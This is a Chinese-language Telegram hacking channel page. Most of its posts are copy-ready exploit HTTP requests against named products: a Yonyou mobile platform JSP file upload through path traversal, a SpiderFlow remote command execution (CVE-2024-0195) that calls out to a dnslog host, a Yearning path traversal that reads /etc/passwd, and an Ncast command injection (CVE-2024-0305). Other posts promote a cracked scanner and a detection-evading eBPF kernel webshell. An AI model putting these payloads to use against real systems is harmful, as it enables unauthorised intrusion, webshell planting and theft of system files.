NEW BOT Телеграм, страница

踹哈公寓

用友移动管理平台uploadIcon任意文件上传漏洞

POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Content-Length: 184Accept-Encoding: gzip, deflateConnection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWSL-CE-SUID: 15------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="file"; filename="c0fig.jsp"<% out.println("123");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--

响应包中显示了上传后的文件路径

👍1

1.57K views03:22

踹哈公寓

🚓🚓🚓🚓🚓🚓

🫡8👍1

2.38K views08:06

踹哈公寓

Channel photo updated

11:40

踹哈公寓

Channel name was changed to «🐉黑客龙图基地🐉»

11:40

踹哈公寓

xray 1.95 高级版

1.69K views13:06

1.81K views13:07

SpiderFlow爬虫平台远程命令执行漏洞（CVE-2024-0195）

POST /function/save HTTP/1.1Host: 192.168.40.130:8088User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 121Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestid=1&name=cmd&parameter=rce&noscript=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

dns平台收到ping请求记录则说明存在漏洞

1.65K views01:23

踹哈公寓

Yearning front 任意文件读取漏洞

app="Yearning"

GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1Host: your-ipUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate

1.64K views01:24

踹哈公寓

https://mp.weixin.qq.com/s/Oy0PvuO2GkSFkqN8d_W3-A

Weixin Official Accounts Platform

海康威视IP网络对讲系统漏洞合集

1.63K views02:31

踹哈公寓

新型内核马

无进程、无端口、无文件（注入后文件可删除）执行命令不会新建shell进程，无法通过常规行为检测

将WebShell注入内核，无法通过常规内存检测可改造内核马，适配HTTP协议以外的所有协议

通过ebpf hook入/出口流量，筛选出特定的恶意命令。再通过hook execve等函数，将其他进程正常执行的命令替换为恶意命令，达到WebShell的效果

项目地址:https://github.com/veo/ebpf_shell

GitHub

GitHub - veo/ebpf_shell: ebpf WebShell/内核马，一种新型内核马/WebShell技术

ebpf WebShell/内核马，一种新型内核马/WebShell技术. Contribute to veo/ebpf_shell development by creating an account on GitHub.

3.52K views09:00

踹哈公寓

http://47.100.228.108/

webshell在线检测

🔥1

1.93K views09:36

踹哈公寓

一等情事

许一鸣

「一等情事」- 许一鸣
专辑: 一等情事
#网易云音乐 #flac 21.42MB 829.12kbps
via @Music163bot

1.74K views14:37

踹哈公寓

这勾巴是啊啥这是中国人写的吗

1.69K views03:47

踹哈公寓

CVE-2024-0305 Ncast盈可视高清智能录播系统busiFacade RCE漏洞

app="Ncast-产品" && noscript=="高清智能录播系统"

POST /classes/common/busiFacade.php HTTP/1.1Host: 192.168.40.130:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Connection: closeContent-Length: 154Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequest%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

1.64K views06:57

踹哈公寓

【第六届腾讯信息安全争霸赛圆满结束，浙大AAA战队斩获冠军！-哔哩哔哩】 https://b23.tv/a9lfXvd

查询清华状态

Bilibili

第六届腾讯信息安全争霸赛圆满结束，浙大AAA战队斩获冠军！_哔哩哔哩_bilibili

12月8号，第六届腾讯信息安全争霸赛（TCTF）新星邀请赛决赛在上海圆满结束，来自浙江大学的AAA战队斩获总冠军，清华大学的Redbud战队和联合战队NaN分别位列亚军和季军。, 视频播放量 19968、弹幕量 4、点赞数 226、投硬币枚数 9、收藏人数 72、转发人数 45, 视频作者腾讯安全, 作者简介给你满满的安全感，相关视频：第五届腾讯信息安全争霸赛TCTF2021 回放（1），第五届腾讯信息安全争霸赛TCTF2021 回放（3），第五届腾讯信息安全争霸赛TCTF2021 回放（5），第五…

1.85K views15:01

踹哈公寓